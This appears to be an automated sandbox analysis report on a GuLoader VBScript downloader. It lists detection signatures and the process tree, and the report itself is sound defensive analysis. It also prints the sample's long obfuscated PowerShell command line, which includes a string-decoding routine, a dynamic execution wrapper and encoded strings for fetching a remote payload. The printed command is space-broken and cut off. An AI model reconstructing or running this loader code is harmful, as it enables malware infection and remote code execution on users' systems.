Edit tour
Windows
Analysis Report
IMG-35235235523525235252532535Selvfinansieret.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2548 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\IMG-3 5235235523 5252352525 32535Selvf inansieret .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2664 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Megamper e='Sub';$M egampere+= 'strin';$S ensualisti ske = 1;$M egampere+= 'g';Functi on Skdefra kker($Gyld igt){$Door s=$Gyldigt .Length-$S ensualisti ske;For($P apirtigern e=5;$Papir tigerne -l t $Doors;$ Papirtiger ne+=6){$Re oxygenize+ =$Gyldigt. $Megampere .Invoke( $ Papirtiger ne, $Sensu alistiske) ;}$Reoxyge nize;}func tion Hadaw ay($Awiggl e){ & ($Feeblene sses) ($Aw iggle);}$A llitterati onernes=Sk defrakker ' InveMUns taozithazF ort.i .ont lAcro.lWo riaOffen/, odel5Snf,e . Svir0Apa g. Medle(F aktWAlure iAngwin Sa lpd fortoA kti wFo,eo sDeval ,la tfNgrozaT Midt Teleg 1Sa.pe0Di, se.bedir0F ranc; Toxi Non.WSlur iDerkrnma ner6Qui.q4 Tids; Spa a DiffxAde ,o6Non.q4B edri;fogus Skivr,lom mvSlagl:in com1Sti l2 Cy,t1Pund u.Paran0St ill),asto LadeGSangu eunp,rc ,i thkRoop oP reco/,enom 2Besva0Cov is1 Inno0P udsi0Harpe 1 B.mp0In, an1Chait G otthFPrikk iSlfanrDra pfeHy,stfP eakioB.gca xNoi.e/San it1Van b2f uril1Klept .Augus0Cen te ';$Unre sponsible= Skdefrakke r 'I.ddaUG rappsElbap eHovedrInt en-AdskiA Rel.gAgerb eUns,rnFlu ort In,k ' ;$Gualaca= Skdefrakke r 'SowabhS ubtotFedte tAnsatpEli zas Forr: uci/Fakul/ ChrorE.to gaRecormBe nzoiBlundr MozegeCent axKo le.Gr un r Logfo Fo,dl/Sli euSchatn,n terp Aeror RespoiFnug ln MinicLo giciUnderp Aquarl.iii seT.ividR. gti.Sketcs Vir.eeTr u sapaala '; $sacrum=Sk defrakker 'Llers>Fru gt ';$Feeb lenesses=S kdefrakker 'BulimiRe maie vi.tx Bryll ';$L ophiostomo us='Westfi lms';$Opkr sler250 = Skdefrakke r ' Lo he TralcUdhol h JagtoFre da Brune%S e.weaBrne, pD.iftpCho kpdV.lutaO ptrktStend aSangu%Slu mm\ or dDS tandsAbett e ,nken S lgerorsc.A ramiKoppon nU,dereHar mo in,on& A zo&Ko ku Va,deOver pcUnde.hSc o,ooSkopu DeputFeday ';Hadaway (Skdefrak ker ' Fors $V lgrgRke b lSherroS tophbOverf aBisexllus tr:Mumb.RE ksemaHarem dStilbiOve reoOtosaa DublcTonea tMac.si Ou t.vSamboeP iloc=Prism (DishwcLoo emChiqudb lake Ant,t /.gnencSdi gh Faste$ GemsOStats p ugebkDub lirPreens paralExces eDimenrInc o.2ind.a5K las,0T,ana )M,rkw '); Hadaway (S kdefrakker 'Exfig$ A fmag Estol RekogoProp ubPlopsaOr loglBange: .eglvDDoor keCel irGo urmvMa,kei GasosPoli th Anthl A t miNonphk renuleRekt o= Sl.m$Co rslG Lillu SteraT.yk plAgraraAd rescBartea Tran.Wo r is.ontop G realAx.nei Par.tStjf l( Peri$mu tins Al,ua Stalic ,yt irE.trauBr eakmConci) Unmov ');$ Gualaca=$D ervishlike [0];$Mayac a= (Skdefr akker 'Com ,r$ IntrgO .erllTra h oSdva b,ko hoaU,dullS ortk: Kon. W Iba.a No puadvanbg erodeN.are eTilbunHex ac2S.der0T ima 5Dan e =PuttiNFor gje Intew Sm d-H.sma O JunkbTor pej HomoeF rticMisce teurok H,r oiSPantiyN abonsAnteb tWakaseGri f,mHeste.o btruNop,eg